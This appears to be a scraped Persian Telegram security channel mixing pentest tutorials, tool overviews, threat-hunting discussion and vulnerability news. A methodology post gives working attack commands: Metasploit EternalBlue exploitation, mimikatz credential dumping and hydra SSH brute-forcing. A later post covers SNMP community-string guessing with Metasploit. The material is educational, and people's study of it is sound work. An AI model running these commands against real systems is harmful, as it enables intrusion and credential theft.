🧧Response code HTTP STATUS🧧
100-199 informetion (اطلاعات سایت)
200-299 ok (سایت باز شد)
300-399 redirect(ریدایرکت شده به یه سایت دیگه)
400-499 erore client side (مثال ارور 404)
500-599 erore server side (مثال ارور 503)
https://news.1rj.ru/str/ViperNull
100-199 informetion (اطلاعات سایت)
200-299 ok (سایت باز شد)
300-399 redirect(ریدایرکت شده به یه سایت دیگه)
400-499 erore client side (مثال ارور 404)
500-599 erore server side (مثال ارور 503)
https://news.1rj.ru/str/ViperNull
❤🔥7
Forwarded from KALI
برای تست نفوذ شبکه و تجهیزات معمولاً چند مسیر مشخص داریم که باید مرحله به مرحله جلو بریم.
🔹 ۱. شناسایی (Enumeration & Recon)
اول باید شبکه و تجهیزات هدف رو شناسایی کنیم.
🔸 هدف: پیدا کردن پورتهای باز، سرویسهای فعال و سیستمعامل دستگاهها.
🔹 ۲. کشف آسیبپذیری (Vulnerability Scanning)
بعد از شناسایی سرویسها، باید ببینیم چه ضعفهایی وجود داره.
🔸 هدف: پیدا کردن باگهای شناختهشده و کانفیگهای ضعیف.
🔹 ۳. اکسپلویت (Exploitation)
وقتی ضعف پیدا شد، تست بهرهبرداری میکنیم (با مجوز).
🔸 هدف: بررسی اینکه ضعف امنیتی واقعاً قابل سوءاستفاده هست یا نه.
🔹 ۴. پس از نفوذ (Post-Exploitation)
اگر نفوذ موفقیتآمیز بود، تست میکنیم که دسترسی تا کجا قابل گسترش هست.
🔸 هدف: بررسی سطح دسترسی، جمعآوری اطلاعات بیشتر و شناسایی خطرات.
🔹 ۵. تست تجهیزات شبکه (Router, Switch, Firewall)
روی تجهیزات شبکه هم تستهای خاص انجام میشه:
🔸 هدف: بررسی تنظیمات پیشفرض و پسوردهای ضعیف.
@kali_signal
🔹 ۱. شناسایی (Enumeration & Recon)
اول باید شبکه و تجهیزات هدف رو شناسایی کنیم.
# پینگ برای بررسی فعال بودن هاست
ping -c 4 192.168.1.1
# شناسایی سرویسها و پورتها با Nmap
nmap -sS -sV -O 192.168.1.0/24
# اسکن برای پورتهای باز سریع
nmap -p- --open -T4 192.168.1.10
# شناسایی سیستمعامل
nmap -O 192.168.1.10
# شناسایی ورژن سرویسها
nmap -sV 192.168.1.10
🔸 هدف: پیدا کردن پورتهای باز، سرویسهای فعال و سیستمعامل دستگاهها.
🔹 ۲. کشف آسیبپذیری (Vulnerability Scanning)
بعد از شناسایی سرویسها، باید ببینیم چه ضعفهایی وجود داره.
# اسکن آسیبپذیری با Nmap Script Engine (NSE)
nmap --noscript vuln 192.168.1.10
# استفاده از Nikto برای شناسایی وبسرورها
nikto -h http://192.168.1.20
# استفاده از OpenVAS یا GVM
gvm-cli socket --xml "<get_tasks/>"
🔸 هدف: پیدا کردن باگهای شناختهشده و کانفیگهای ضعیف.
🔹 ۳. اکسپلویت (Exploitation)
وقتی ضعف پیدا شد، تست بهرهبرداری میکنیم (با مجوز).
# اجرای متاسپلویت
msfconsole
# سرچ اکسپلویت برای سرویس
search smb
# ست کردن هدف
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.10
run
🔸 هدف: بررسی اینکه ضعف امنیتی واقعاً قابل سوءاستفاده هست یا نه.
🔹 ۴. پس از نفوذ (Post-Exploitation)
اگر نفوذ موفقیتآمیز بود، تست میکنیم که دسترسی تا کجا قابل گسترش هست.
# گرفتن اطلاعات سیستم
systeminfo
# لیست کاربران
net user
# دسترسی به پسوردهای ذخیرهشده
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
🔸 هدف: بررسی سطح دسترسی، جمعآوری اطلاعات بیشتر و شناسایی خطرات.
🔹 ۵. تست تجهیزات شبکه (Router, Switch, Firewall)
روی تجهیزات شبکه هم تستهای خاص انجام میشه:
# بررسی SNMP
nmap -sU -p 161 192.168.1.1 --noscript=snmp*
# بررسی Telnet/SSH باز بودن
nmap -p 22,23 192.168.1.1
# تست رمزهای ضعیف روی SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
🔸 هدف: بررسی تنظیمات پیشفرض و پسوردهای ضعیف.
@kali_signal
❤🔥4❤1🔥1
ViperNułł
https://news.1rj.ru/str/ViperNull
ابزار SpiderFoot دستیار خفن جمعآوری اطلاعات متنباز در امنیت سایبری
اصلا ابزار SpiderFoot چی هستش؟
یه ابزار فوقالعاده که اتوماتیکه و کمک میکنه اطلاعات عمومی و باز (Open Source Intelligence یا OSINT) رو درباره یه دامنه، ایمیل، IP و ... جمعآوری کنیم.
به جای اینکه ساعتها با موتورهای جستجو و سایتهای مختلف وقت بذاری، SpiderFoot همهچیز رو سریع میره و جمع میکنه
دقیقا چیکار میکنه؟
از کلی پلاگین (ماژول) استفاده میکنه که هر کدوم بخشی از اطلاعات رو استخراج میکنن؛ مثلاً:
نامهای دامنه مرتبط
آدرسهای ایمیل کارکنان
فناوریهای استفاده شده تو سایت
دادههای شبکه و سرورها
و کلی چیز دیگه
کاربردش چیه؟
تو تست نفوذ، تحلیل امنیتی، و حتی تحقیقات دیجیتال خیلی به درد میخوره. فرض کنید میخواین بدونین یه شرکت یا سایت چقدر اطلاعات ازش بیرون ریخته و چقدر تو فضای عمومی قابل دسترسیه. خب پس بدرد فیلد بلو هم میخوره
نکات مهم درباره سروصدا و دیده شدن این ابزار بخامبگم
SpiderFoot
زیاد سر و صدا نمیکنه، چون از منابع عمومی و API استفاده میکنه،
ولی اگر پلاگینها زیاد باشن تعداد درخواستها بالا میره و ممکنه ردپایی بزاره. البته به هیچ وجه شبیه یه حمله مستقیم نیستش.
محدودیتها و ریسکهایی که ممکنه به وجود بیاد
همه اطلاعاتی که میخواد جمع کنه همیشه کامل و بهروز نیست
بعضی سایتها یا سرویسها ممکنه دسترسی رو محدود کنن
اگر ندانسته استفاده بکنیم ممکنه اطلاعات حساس یا خصوصی رو بیرون بده که خطرساز میشه
https://news.1rj.ru/str/ViperNull
اصلا ابزار SpiderFoot چی هستش؟
یه ابزار فوقالعاده که اتوماتیکه و کمک میکنه اطلاعات عمومی و باز (Open Source Intelligence یا OSINT) رو درباره یه دامنه، ایمیل، IP و ... جمعآوری کنیم.
به جای اینکه ساعتها با موتورهای جستجو و سایتهای مختلف وقت بذاری، SpiderFoot همهچیز رو سریع میره و جمع میکنه
دقیقا چیکار میکنه؟
از کلی پلاگین (ماژول) استفاده میکنه که هر کدوم بخشی از اطلاعات رو استخراج میکنن؛ مثلاً:
نامهای دامنه مرتبط
آدرسهای ایمیل کارکنان
فناوریهای استفاده شده تو سایت
دادههای شبکه و سرورها
و کلی چیز دیگه
کاربردش چیه؟
تو تست نفوذ، تحلیل امنیتی، و حتی تحقیقات دیجیتال خیلی به درد میخوره. فرض کنید میخواین بدونین یه شرکت یا سایت چقدر اطلاعات ازش بیرون ریخته و چقدر تو فضای عمومی قابل دسترسیه. خب پس بدرد فیلد بلو هم میخوره
نکات مهم درباره سروصدا و دیده شدن این ابزار بخامبگم
SpiderFoot
زیاد سر و صدا نمیکنه، چون از منابع عمومی و API استفاده میکنه،
ولی اگر پلاگینها زیاد باشن تعداد درخواستها بالا میره و ممکنه ردپایی بزاره. البته به هیچ وجه شبیه یه حمله مستقیم نیستش.
محدودیتها و ریسکهایی که ممکنه به وجود بیاد
همه اطلاعاتی که میخواد جمع کنه همیشه کامل و بهروز نیست
بعضی سایتها یا سرویسها ممکنه دسترسی رو محدود کنن
اگر ندانسته استفاده بکنیم ممکنه اطلاعات حساس یا خصوصی رو بیرون بده که خطرساز میشه
https://news.1rj.ru/str/ViperNull
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
❤🔥4🔥1
ViperNułł
https://news.1rj.ru/str/ViperNull
DNS Zone Transfer
چیست و چطور میتوان آن را تشخیص داد؟
قبل از هر چیز یک توضیح کوتاه درباره DNS بدم :
DNS یا Domain Name System
سرویس اصلی اینترنت برای تبدیل نام دامنه به IP هستش. وقتی شما میخواهید وارد مثلاً example.com شوید، کامپیوتر شما نمیتواند مستقیم نام دامنه را بفهمد و به آن متصل شود، چون پروتکل اینترنت فقط با IP کار میکند. DNS مثل یک دفترچه تلفن اینترنتی عمل میکنه که IP متناظر با هر دامنه رو برمیگردونه
هر سایت روی اینترنت یک یا چند DNS سرور دارد که مسئول ارائه این اطلاعات هستن. وقتی مدیر سایت، اطلاعات دامنه خود را روی DNS سرور قرار میدهد، این اطلاعات در دسترس کاربران قرار میگیره. اما بعضی وقتا برخی از سابدامینها یا اطلاعات حساس به اشتباه روی DNS سرور تعریف میشن و ممکن است توسط یک مهاجم قابل دسترسی باشن
Zone Transfer
چیست؟
Zone Transfer یا AXFR
یک فرایند در DNS است که برای کپی کردن تمام اطلاعات یک دامنه از یک DNS سرور استفاده میشود
به زبان ساده بخام بگم
یک مهاجم میتوانه از طریق Zone Transfer کل دایرهالمعارف DNS یک دامنه شامل تمام سابدامینهاش رکوردهای MX، A، TXT و غیره رو بدست بیاره
اما یه نکته این فرایند اکثراً موفق نیست چون اکثر DNS سرورها با پالیسیهای امنیتی درست تنظیم شدهاند و Zone Transfer به درخواستهای ناشناس پاسخ نمیده
اما با این حال برخی DNS سرورهای ضعیف یا بد پیکربندی شده به اشتباه اطلاعات را در اختیار مهاجم قرار میدن
یه مثال عملی بخام بگم
فرض کنید میخوایم برای دامنه zonetransfer.me
سرورهای DNS رو پیدا کنیم و Zone Transfer رو تست کنیم
1 ابتدا لیست سرورهای معتبر رو پیدا میکنیم:
dig +short NS zonetransfer.me
این دستور نام DNS سرورهای دامنه را برمیگردونه مثال بزنم
nsztm1.dnsowl.com
nsztm2.dnsowl.com
سپس تلاش میکنیم Zone Transfer انجام بدیم
dig @nsztm1.dnsowl.com zonetransfer.me AXFR
اگر سرور به درستی پیکربندی شده باشد، معمولاً خطای دسترسی دریافت میکنیم و عملیات ناموفق است. اما اگر سرور ضعیف باشد، تمام رکوردهای دامنه نمایش داده میشود.
نکات مهم برای SOC
برای SOC (Security Operations Center)
Zone Transfer
میتواند هم تهدید باشد و هم منبع اطلاعات مفید برای کشف مشکلات امنیتی:
شناسایی فعالیت مشکوک:
درخواستهای AXFR از منابع خارجی میتواند نشانه تلاش مهاجم برای جمعآوری اطلاعات باشن
ثبت لاگهای DNS برای تحلیل چنین فعالیتهایی ضروریه
پالیسیها :
اطمینان از اینکه Zone Transfer فقط بین DNSهای داخلی انجام میشه و برای عموم مسدود هستش
بررسی و محدود کردن دسترسی به سرویسهای DNS در فایروال و ACL
تستهای امنیتی داخلی:
تستهای دورهای Zone Transfer روی سرورهای داخلی برای شناسایی مشکلات پیکربندی قبل از نفوذ مهاجم
استفاده از ابزارهایی مثل dig یا اسکریپتهای خودکار برای کشف رکوردهای غیرمجاز
هشدار و واکنش:
هرگونه تلاش برای Zone Transfer از منابع غیرمجاز باید به سرعت به تیم SOC اطلاع داده بشه
میتوان سیستم هشدار خودکار برای ترافیک DNS غیرمعمول راهاندازی بکنیم
https://news.1rj.ru/str/ViperNull
چیست و چطور میتوان آن را تشخیص داد؟
قبل از هر چیز یک توضیح کوتاه درباره DNS بدم :
DNS یا Domain Name System
سرویس اصلی اینترنت برای تبدیل نام دامنه به IP هستش. وقتی شما میخواهید وارد مثلاً example.com شوید، کامپیوتر شما نمیتواند مستقیم نام دامنه را بفهمد و به آن متصل شود، چون پروتکل اینترنت فقط با IP کار میکند. DNS مثل یک دفترچه تلفن اینترنتی عمل میکنه که IP متناظر با هر دامنه رو برمیگردونه
هر سایت روی اینترنت یک یا چند DNS سرور دارد که مسئول ارائه این اطلاعات هستن. وقتی مدیر سایت، اطلاعات دامنه خود را روی DNS سرور قرار میدهد، این اطلاعات در دسترس کاربران قرار میگیره. اما بعضی وقتا برخی از سابدامینها یا اطلاعات حساس به اشتباه روی DNS سرور تعریف میشن و ممکن است توسط یک مهاجم قابل دسترسی باشن
Zone Transfer
چیست؟
Zone Transfer یا AXFR
یک فرایند در DNS است که برای کپی کردن تمام اطلاعات یک دامنه از یک DNS سرور استفاده میشود
به زبان ساده بخام بگم
یک مهاجم میتوانه از طریق Zone Transfer کل دایرهالمعارف DNS یک دامنه شامل تمام سابدامینهاش رکوردهای MX، A، TXT و غیره رو بدست بیاره
اما یه نکته این فرایند اکثراً موفق نیست چون اکثر DNS سرورها با پالیسیهای امنیتی درست تنظیم شدهاند و Zone Transfer به درخواستهای ناشناس پاسخ نمیده
اما با این حال برخی DNS سرورهای ضعیف یا بد پیکربندی شده به اشتباه اطلاعات را در اختیار مهاجم قرار میدن
یه مثال عملی بخام بگم
فرض کنید میخوایم برای دامنه zonetransfer.me
سرورهای DNS رو پیدا کنیم و Zone Transfer رو تست کنیم
1 ابتدا لیست سرورهای معتبر رو پیدا میکنیم:
dig +short NS zonetransfer.me
این دستور نام DNS سرورهای دامنه را برمیگردونه مثال بزنم
nsztm1.dnsowl.com
nsztm2.dnsowl.com
سپس تلاش میکنیم Zone Transfer انجام بدیم
dig @nsztm1.dnsowl.com zonetransfer.me AXFR
اگر سرور به درستی پیکربندی شده باشد، معمولاً خطای دسترسی دریافت میکنیم و عملیات ناموفق است. اما اگر سرور ضعیف باشد، تمام رکوردهای دامنه نمایش داده میشود.
نکات مهم برای SOC
برای SOC (Security Operations Center)
Zone Transfer
میتواند هم تهدید باشد و هم منبع اطلاعات مفید برای کشف مشکلات امنیتی:
شناسایی فعالیت مشکوک:
درخواستهای AXFR از منابع خارجی میتواند نشانه تلاش مهاجم برای جمعآوری اطلاعات باشن
ثبت لاگهای DNS برای تحلیل چنین فعالیتهایی ضروریه
پالیسیها :
اطمینان از اینکه Zone Transfer فقط بین DNSهای داخلی انجام میشه و برای عموم مسدود هستش
بررسی و محدود کردن دسترسی به سرویسهای DNS در فایروال و ACL
تستهای امنیتی داخلی:
تستهای دورهای Zone Transfer روی سرورهای داخلی برای شناسایی مشکلات پیکربندی قبل از نفوذ مهاجم
استفاده از ابزارهایی مثل dig یا اسکریپتهای خودکار برای کشف رکوردهای غیرمجاز
هشدار و واکنش:
هرگونه تلاش برای Zone Transfer از منابع غیرمجاز باید به سرعت به تیم SOC اطلاع داده بشه
میتوان سیستم هشدار خودکار برای ترافیک DNS غیرمعمول راهاندازی بکنیم
https://news.1rj.ru/str/ViperNull
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
👏5🔥2
برای دیدن یه نمونه باحال از XSS با عکس و متادیتا (EXIF) این مقاله رو حتما بخونین :
https://shahjerry33.medium.com/xss-via-exif-data-the-p2-elevator-d09e7b7fe9b9
https://news.1rj.ru/str/ViperNull
https://shahjerry33.medium.com/xss-via-exif-data-the-p2-elevator-d09e7b7fe9b9
https://news.1rj.ru/str/ViperNull
❤🔥6
Forwarded from CyberSecurity Shield (Pouyan Zamani)
سلام و درود
شب بخیر
امروز سر کار بحث فنی بسیار جالبی و آموزنده ای داشتیم در خصوص شکار تهدیدات، حیفم آمد به اشتراک نذارم:
ما شکار تهدیدات رو به دو بخش تقسیم کردیم:
structured و unstructured!
شکار ساختار یافته (structured) مبتنی بر evidence هست. حالا این evidence میتونه یک ioa باشه، یه گزارش ti باشه، خروجی فعالیت purple teaming باشه.
شکار بدون ساختار (unstructured) مبتنی بر دیتا هست. حالا این دیتا میتونه از گزارشات امنیتی، از ti که هنوز تبدیل به Detection rule نشده، گزارشات red team، از حتی اخبار امنیتی باشه.
جفت این مدلها، مارو هدايت میکنه سمت ایجاد فرضیه!
حالا این فرضیه میتونه بصورت ساختار یافته تو شبکه جستجو شه با اسکوپ مشخص (معمولا mitre att&ck رو به عنوان چارچوب کار انتخاب میکنند و متمرکز روی post exploitation)!
یا
فرضیه بدون ساختار خاصی و مبتنی بر discovery انجام شده پای مثلا یک سیستم ادامه پیدا کنه!
حالا این وسط soc میگه منم دارم فرایند Purple teaming رو میبرم جلو! ضعف هام رو شناسایی میکنم و براشون Detection rule مینویسم! از طرفی اگر هم visibility gap داشته باشم، اونم از گزارشات red team که purple teaming پردازش میکنه agent روش نصب میکنم و پوشش میدم! این وسط یه سوال ایجاد میشه که: چرا باید Hunting داشته باشیم؟ احیانا overlap نداره کارها؟ تو نگاه اول، claim بسیار منطقی هست! من خودم عمیق به فکر فرو رفتم! واقعا چرا hunting میخواهیم؟ نکنه overlap داریم واقعا؟!
برای پاسخ به این سوال، اول باید بفهمیم رویکرد hunting چیه؟ اون چیزی که من متوجه شدم از hunting، این هست که فعالیتیست proactive جهت یافتن شواهد یا دیتایی از تهدیدات با پیشفرض دور خوردن مکانیزمهای امنیتی!
از نگاه threat hunting، تمامی Detection rule ها، قابلیت دور خوردن دارند! حتی اونایی که با * نوشته شدن😁!
شکار هست که این گپهارو کاور کنه و در نهایت کمک کنه به detection بهتر به عنوان یک لایه دیگه!
چرا یه لایه دیگه میخواهیم؟ بخاطر defense in depth؟
شاید اگر کتاب Time-Based Security رو میخوندیم یا خلاصه ای که مهندس مولایی عزیز برای تنبلهایی مثل من گذاشته یه نگاهی بندازیم: معماری امن میگه شما باید معادلهی p>d+r رو برقرار کنی برای سیستم! وگرنه امنیت شما زیر سوال خواهد بود!
مثال بزنم:
اگر p که نشان از protection داره ۲ ساعت بتونه جلوی حملات سایبری دووم بیاره، یا اینطوری نگاهش کنیم که ۲ ساعت طول میکشه که دورش بزنن، سرعت detection و response ما باید الزاما زیر ۱ ساعت و ۵۹ دقیقه باشه که بتونیم ادعا کنیم سیستم امن مونده!
حالا سوال: چقدر طول میکشه قوانین detection ما دور بخوره؟
کی قراره این تیکه رو کاور کنه و proactice بگرده تو شبکه دنبال همین شواهد؟
کجا بهتر از soc میتونه از خروجی شکار نفع ببره؟
شکار تهدیدات به عنوان یک بازوی عملیاتی proactive برای soc میتونه تو کاهش سرعت detection تاثیر بسزایی در بهبود عملکرد soc داشته باشه!
برای شکار، visibility حرف اول رو میزنه! جایی که visibility نباشه، صِرف نصب کردن agent شما به detection نمیرسی! اگر اینطوری بود که همه agent نصب میکردند و امن میشدند و detection برقرار میشد براشون! برای تمام حملات میشه detection نوشت؟ اگر اوکیه که من تمام detection ruleهای دنیا رو میدم بهتون بزنید تو سامانههاتون و برید خونه بخوابید راحت!
این نگاه رو شما هم بهش فکر کنید نظر بدید!
یادمون نره نگاه شکار تهدیدات بر این مبنا بود که Detection های ما توسط مهاجم همین الان bypass شده!
این نتیجهای بود که ما بعد از ۲ ساعت جلسه فنی سنگین با همکارامون گرفتیم!
حالا منتظر نظرات و ایدههاتون هستم ببینم کجای راه رو سمت شکار تهدیدات اشتباه رفتیم، اصلاحش کنیم!
شب بخیر
امروز سر کار بحث فنی بسیار جالبی و آموزنده ای داشتیم در خصوص شکار تهدیدات، حیفم آمد به اشتراک نذارم:
ما شکار تهدیدات رو به دو بخش تقسیم کردیم:
structured و unstructured!
شکار ساختار یافته (structured) مبتنی بر evidence هست. حالا این evidence میتونه یک ioa باشه، یه گزارش ti باشه، خروجی فعالیت purple teaming باشه.
شکار بدون ساختار (unstructured) مبتنی بر دیتا هست. حالا این دیتا میتونه از گزارشات امنیتی، از ti که هنوز تبدیل به Detection rule نشده، گزارشات red team، از حتی اخبار امنیتی باشه.
جفت این مدلها، مارو هدايت میکنه سمت ایجاد فرضیه!
حالا این فرضیه میتونه بصورت ساختار یافته تو شبکه جستجو شه با اسکوپ مشخص (معمولا mitre att&ck رو به عنوان چارچوب کار انتخاب میکنند و متمرکز روی post exploitation)!
یا
فرضیه بدون ساختار خاصی و مبتنی بر discovery انجام شده پای مثلا یک سیستم ادامه پیدا کنه!
حالا این وسط soc میگه منم دارم فرایند Purple teaming رو میبرم جلو! ضعف هام رو شناسایی میکنم و براشون Detection rule مینویسم! از طرفی اگر هم visibility gap داشته باشم، اونم از گزارشات red team که purple teaming پردازش میکنه agent روش نصب میکنم و پوشش میدم! این وسط یه سوال ایجاد میشه که: چرا باید Hunting داشته باشیم؟ احیانا overlap نداره کارها؟ تو نگاه اول، claim بسیار منطقی هست! من خودم عمیق به فکر فرو رفتم! واقعا چرا hunting میخواهیم؟ نکنه overlap داریم واقعا؟!
برای پاسخ به این سوال، اول باید بفهمیم رویکرد hunting چیه؟ اون چیزی که من متوجه شدم از hunting، این هست که فعالیتیست proactive جهت یافتن شواهد یا دیتایی از تهدیدات با پیشفرض دور خوردن مکانیزمهای امنیتی!
از نگاه threat hunting، تمامی Detection rule ها، قابلیت دور خوردن دارند! حتی اونایی که با * نوشته شدن😁!
شکار هست که این گپهارو کاور کنه و در نهایت کمک کنه به detection بهتر به عنوان یک لایه دیگه!
چرا یه لایه دیگه میخواهیم؟ بخاطر defense in depth؟
شاید اگر کتاب Time-Based Security رو میخوندیم یا خلاصه ای که مهندس مولایی عزیز برای تنبلهایی مثل من گذاشته یه نگاهی بندازیم: معماری امن میگه شما باید معادلهی p>d+r رو برقرار کنی برای سیستم! وگرنه امنیت شما زیر سوال خواهد بود!
مثال بزنم:
اگر p که نشان از protection داره ۲ ساعت بتونه جلوی حملات سایبری دووم بیاره، یا اینطوری نگاهش کنیم که ۲ ساعت طول میکشه که دورش بزنن، سرعت detection و response ما باید الزاما زیر ۱ ساعت و ۵۹ دقیقه باشه که بتونیم ادعا کنیم سیستم امن مونده!
حالا سوال: چقدر طول میکشه قوانین detection ما دور بخوره؟
کی قراره این تیکه رو کاور کنه و proactice بگرده تو شبکه دنبال همین شواهد؟
کجا بهتر از soc میتونه از خروجی شکار نفع ببره؟
شکار تهدیدات به عنوان یک بازوی عملیاتی proactive برای soc میتونه تو کاهش سرعت detection تاثیر بسزایی در بهبود عملکرد soc داشته باشه!
برای شکار، visibility حرف اول رو میزنه! جایی که visibility نباشه، صِرف نصب کردن agent شما به detection نمیرسی! اگر اینطوری بود که همه agent نصب میکردند و امن میشدند و detection برقرار میشد براشون! برای تمام حملات میشه detection نوشت؟ اگر اوکیه که من تمام detection ruleهای دنیا رو میدم بهتون بزنید تو سامانههاتون و برید خونه بخوابید راحت!
این نگاه رو شما هم بهش فکر کنید نظر بدید!
یادمون نره نگاه شکار تهدیدات بر این مبنا بود که Detection های ما توسط مهاجم همین الان bypass شده!
این نتیجهای بود که ما بعد از ۲ ساعت جلسه فنی سنگین با همکارامون گرفتیم!
حالا منتظر نظرات و ایدههاتون هستم ببینم کجای راه رو سمت شکار تهدیدات اشتباه رفتیم، اصلاحش کنیم!
Forwarded from OnHex
🔴 اپل یسری بروزرسانی منتشر کرده تا اصلاحیه هایی که ماههای قبل برای دستگاههای جدیدش منتشر کرده بود رو، در نسخه های قدیمی آیفون و آیپ اصلاح کنه.
در این بروزرسانی یک آسیب پذیری زیرودی با شناسه ی CVE-2025-43300 هم اصلاح شده که قبلا اپل برای دستگاههای دارای iOS 18.6.2 و iPadOS 18.6.2، همچنین iPadOS 17.7.10 و نسخه های مک (Sequoia 15.6.1، Sonoma 14.7.8 و Ventura 13.7.8) پچ کرده بود.
این آسیب پذیری از نوع Out-of-Bounds Write و در فریمورک Image I/O بود، فریمورکی که امکان خواندن و نوشتن فرمتهای مختلف فایلهای تصویری رو به اپ ها میده. طبق اعلام اپل، این آسیب پذیری در حملات بسیار پیچیده مورد سوء استفاده قرار گرفته بود.
در حملات Out-of-Bounds Write، مهاجم ورودی مخربی به برنامه میده که باعث میشه داده ها خارج از محدودهی بافر تخصیص داده شده، نوشته بشن. این موضوع میتونه به کرش برنامه، خرابی داده ها، یا حتی اجرای کد از راه دور منجر بشه. بنابراین در این آسیب پذیری، پردازش یک فایل تصویری مخرب میتونه منجر به خرابی حافظه بشه.
اپل در بروزرسانی جدیدش این آسیب پذیری زیرودی رو در نسخه های زیر اصلاح کرده:
از جمله دستگاههای آسیب پذیر:
اگر از این دستگاهها استفاده میکنید، حتما بروزرسانی رو اعمال کنید./منبع
#زیرودی #اپل #آسیب_پذیری_امنیتی
#Apple #0day #Zero_click
🆔 @onhex_ir
➡️ ALL Link
در این بروزرسانی یک آسیب پذیری زیرودی با شناسه ی CVE-2025-43300 هم اصلاح شده که قبلا اپل برای دستگاههای دارای iOS 18.6.2 و iPadOS 18.6.2، همچنین iPadOS 17.7.10 و نسخه های مک (Sequoia 15.6.1، Sonoma 14.7.8 و Ventura 13.7.8) پچ کرده بود.
این آسیب پذیری از نوع Out-of-Bounds Write و در فریمورک Image I/O بود، فریمورکی که امکان خواندن و نوشتن فرمتهای مختلف فایلهای تصویری رو به اپ ها میده. طبق اعلام اپل، این آسیب پذیری در حملات بسیار پیچیده مورد سوء استفاده قرار گرفته بود.
در حملات Out-of-Bounds Write، مهاجم ورودی مخربی به برنامه میده که باعث میشه داده ها خارج از محدودهی بافر تخصیص داده شده، نوشته بشن. این موضوع میتونه به کرش برنامه، خرابی داده ها، یا حتی اجرای کد از راه دور منجر بشه. بنابراین در این آسیب پذیری، پردازش یک فایل تصویری مخرب میتونه منجر به خرابی حافظه بشه.
اپل در بروزرسانی جدیدش این آسیب پذیری زیرودی رو در نسخه های زیر اصلاح کرده:
- iOS 15.8.5 / 16.7.12
- iPadOS 15.8.5 / 16.7.12
از جمله دستگاههای آسیب پذیر:
- iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPhone 8, iPhone 8 Plus, and iPhone X,
- iPad Air 2, iPad mini (4th generation), iPad 5th generation, iPad Pro 9.7-inch, iPad Pro 12.9-inch 1st generation, and iPod touch (7th generation)
اگر از این دستگاهها استفاده میکنید، حتما بروزرسانی رو اعمال کنید./منبع
#زیرودی #اپل #آسیب_پذیری_امنیتی
#Apple #0day #Zero_click
🆔 @onhex_ir
➡️ ALL Link
BleepingComputer
Apple backports zero-day patches to older iPhones and iPads
Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks.
🔥2
Forwarded from وب آموز (m J)
⭕️ اگر وب آموز رو دنبال میکنید.
اگر منو دوست دارید و یا حتی ندارید
اسکم مایندر رو در بستر هایی که دارید تبلیغ کنید
اگر مردم عادت کنن از این سرویس استفاده کنند بسیاری درگیر کلاهبرداری های آنلاین نمیشن.
https://scamminder.com/websites/hashfactor.net/
برادر سرباز من، خیلی متاسفم از اتفاقی که برات افتاده ولی کاری نمیتونی بکنی.
🆔 @Webamoozir
اگر منو دوست دارید و یا حتی ندارید
اسکم مایندر رو در بستر هایی که دارید تبلیغ کنید
اگر مردم عادت کنن از این سرویس استفاده کنند بسیاری درگیر کلاهبرداری های آنلاین نمیشن.
https://scamminder.com/websites/hashfactor.net/
برادر سرباز من، خیلی متاسفم از اتفاقی که برات افتاده ولی کاری نمیتونی بکنی.
🆔 @Webamoozir
ViperNułł
https://news.1rj.ru/str/ViperNull 🕸
سلام، امروز میخوام راجع به Enumeration پروتکل SNMP صحبت کنم و مراحل انجامش رو با هم بررسی کنیم.
خب مشخصاً SNMP یه پروتکل برای مانیتورینگ شبکهست — Simple Network Management Protocol — یعنی من با فعال کردن این پروتکل روی دیوایسهای شبکه، اطلاعات خیلی جامعی از وضعیت دستگاه میگیرم و میتونم با استفاده از نرمافزارهای مانیتورینگ مثل Zabbix، SolarWinds یا ManageEngine از این پروتکل برای مانیتورینگ شبکه استفاده کنم.
بعضی دستگاهها بهصورت پیشفرض وقتی SNMP روشون فعال میشه، برای دسترسی read-only یا read-write یه community string دارن که معمولاً کلمات «public» یا «private» انتخاب میشه و خب با حدس زدن این رشته (community string) میتونیم اطلاعات رو بیرون بکشیم.
در ویندوزهای خیلی قدیمی مثل XP و Server 2008، پروتکل SNMP بهصورت پیشفرض فعال بود و مایکروسافت بعداً به دلایل امنیتی و کاهش وابستگی، این تنظیمات پیشفرض رو حذف کرد.
SNMP v1 و v2
رمزنگاری ندارن و اگر بستهها رو sniff کنیم بهراحتی community string مشخص میشه، پس بهتره از SNMPv3 استفاده کنید که احراز هویت و رمزنگاری رو اضافه میکنه.
پورتهای مربوط به SNMP:
پورت 161/UDP برای query/polling هست و پورت 162/UDP برای SNMP Trapها.
برای دیدن فعال بودن سرویس SNMP روی ویندوز میتونیم Win + R بزنیم = services.msc و به دنبال SNMP Service بگردیم.
ما یه چیزی به نام SNMP Trap هم داریم که درواقع پیامهای هشدار هست — مثلاً سیستم منتظر میمونه تا پیغام هشدار (مثلاً دان شدن یه لینک) از طرف دستگاه بیاد. SNMP Trap میتونه بهصورت آنی هشدار رو به سرور مانیتورینگ برسونه. درباره حملهای که میشه با این زد در پستهای آینده مفصلتر میگم، ولی یه نمونهاش SNMP Trapهای جعلی برای گیج کردن سرور مانیتورینگ هست.
نحوه بهرهبرداری از این پروتکل برای enumeration:
ما با ابزار Metasploit میتونیم سیستمهایی که SNMP روشون فعاله رو شناسایی کنیم و یه تست دیکشنریاتک روی پسورد این پروتکل بزنیم. روند در متاسپلویت بهطور خلاصه:
وارد مسیر
use auxiliary/scanner/snmp/snmp_login
میشیم و با ست کردن لیست پسورد و رنج آیپی مقصد، run میکنیم (Metasploit یه لیست پیشفرض برای این کار داره و میتونید از اون یا لیستهای خودتون استفاده کنید).
حالا وقتی community string سیستمهایی که SNMP روشون فعاله رو متوجه شدیم، با وارد شدن به مسیر
use auxiliary/scanner/snmp/snmp_enum
میتونیم درخواست دریافت اطلاعات سیستم رو بدیم — مثل وضعیت پروسسها، اطلاعات کارت شبکه، CPU/RAM، سرویسهای فعال، مشخصات سیستم، مشخصات هارد و ... اطلاعات خیلی ارزشمندی که میتونه توی فاز scanning یا فاز بعدی حمله مفید باشه.
